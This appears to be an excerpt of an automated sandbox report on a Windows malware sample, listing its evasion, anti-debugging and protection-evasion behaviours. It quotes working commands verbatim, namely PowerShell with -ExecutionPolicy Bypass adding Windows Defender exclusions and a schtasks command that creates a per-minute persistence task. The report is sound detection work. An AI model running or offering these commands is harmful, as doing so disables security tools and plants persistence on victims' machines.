                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: ANuh30XoVu.exe, 00000000.00000002.2906383294.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: ANuh30XoVu.exe, SYSTEM.0.drBinary or memory string: SBIEDLL.DLLGPBPQ9TPUMY5VPBYNN9BNSNLFB8OPL0WO17ZGEBIXRTLCULWMYXPXBDELSUZY59U0B37XJ1JGQYXPLCMEXGLXO2ZEQQ5S54AKKIKCS7C35R3GVCAM42DFWW0DQ5NRD6KZYASYYCBTOFFNYORGX6VJC0H0WH3HYKAJRMZAYN6S7GHV3W6GXBTGNGYVTAZKZICTP2GEP2LFDW7N6DQS3NNNZSQGUFRVJMFDYCF8IKC6P4DNVUT2ZNYQVD9C0JLGFRDBF2JYG7XX9G6LHFLRIJW2X1KTW1LXU6NGIBBNIQPOV7LXB0F9ZSDTWOOJKTCJTKGKEEDGAEFGWDWMMLQSMYO6UV1RISSIY71ANZONABWGEYZBHFNDQZHP48QL3SUCFLMUBLWL87EC2POGA67WQFXWG5AE4VMH76WQVI2YY0VQMAX8UVJGZVBKES20XBHOCFOVB9QTDU8BACJVUTGKGGDGYH0RELVKYJWXM2HA56Y6JIVI1VI6ETNWS9GINFO
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeMemory allocated: 1670000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeMemory allocated: 1B2E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: F60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1AC40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 6A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1A410000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 2B30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\SYSTEMMemory allocated: 1ADA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\SYSTEMThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\SYSTEMThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeWindow / User API: threadDelayed 4699Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeWindow / User API: threadDelayed 5118Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6483Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3326Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6079Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3675Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5458Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4183Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7776
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1849
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exe TID: 7020Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2108Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2000Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep count: 7776 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep count: 1849 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2368Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\SYSTEM TID: 6472Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\SYSTEM TID: 7032Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\SYSTEMLast function: Thread delayed
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SYSTEMFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\SYSTEMFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\SYSTEMFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\SYSTEMThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\SYSTEMThread delayed: delay time: 922337203685477
                    Source: SYSTEM.0.drBinary or memory string: vmware
                    Source: ANuh30XoVu.exe, 00000000.00000002.2940018560.000000001C130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeCode function: 0_2_00007FFD9B7774A1 CheckRemoteDebuggerPresent,0_2_00007FFD9B7774A1
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe'
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe'
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ANuh30XoVu.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"Jump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeQueries volume information: C:\Users\user\Desktop\ANuh30XoVu.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
